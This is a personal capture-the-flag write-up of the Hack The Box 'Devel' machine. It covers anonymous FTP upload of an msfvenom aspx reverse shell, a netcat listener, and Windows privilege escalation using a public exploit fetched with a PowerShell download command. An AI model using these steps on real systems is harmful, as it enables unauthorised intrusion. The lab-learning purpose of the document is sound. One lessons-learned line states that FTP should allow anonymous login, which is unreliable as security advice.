This is my attempt to solve HTB’s DEVEL
Not much of the website
Port 21 is open and “Anonymous FTP login is allowed”:
Looking closer by logging in:
I’m able to see items inside:
I learned that I can upload a web shell or reverse shell which help me get access into the site
Reverse Shell:
We can use msfvenom to create our custom payload for the exploit. For a clear understanding make sure to understand the various reverse shells available and to choose the right one. For example, select windows/meterpreter/reverse_tcp only if you use the Metasploit. Make sure to understand the difference between staged and unstaged payloads. In our case we use the non-meterpreter unstaged reverse shell payload windows/shell_reverse_tcp to generate the aspx payload. With this, I have the option to get a shell with a basic netcat listener. The staged version will not work with the netcat listener.
The listening host is the attacking machine (ip address |grep tun) and the port is the one we will listen on. I have created the backdoor executable binary. Upload this file as mentioned above to the FTP root directory.
Now go to the website: and have netcat setup and ready
And I have low privilege:
Privilege Escalation:
As soon as we visit the malicious URL the exploitation process starts. In the listener we can see, that we have a shell running as iis apppool\web.
The next goal is to escalate my privileges. Windows Exploit Suggester is a tool which checks if public exploits are available for a specific machine. For this, I saved the output of systeminfo to a text file.
Key information : Windows 7 | Host name Devel | OS name Windows 7 Enterprise | 6.1.7600 | Hotfix N/A
Windows Priviliege escalation is my weakest area
I went to Google and found this exploit:
The next step is to download and compile the exploit on the attack machine.
I then needed to transfer the C code from the attacker to the victim.
python -m SimpleHTTPServer 8080
wget and curl are not installed on the machine however powershell is.
powershell -c “(new-object System.Net.WebClient).DownloadFile(‘’, ‘c:\Users\Public\Downloads\40564.exe’)”
I then ran [whoami /all]:
User flag:
Root flag:
That’s it
Lessons Learned:
FTP Should have an open login like anonymous.
Anyone like I just did can upload a Web shell and exploit the system.
I recommend either patching Windows 7 Enterprise or upgrading to the modern version of Windows and service for Windows 7 is now depricated.
Overall this box was challenging, I cold have done it with Metasploit, but I’m trying to get better without using Metasploit.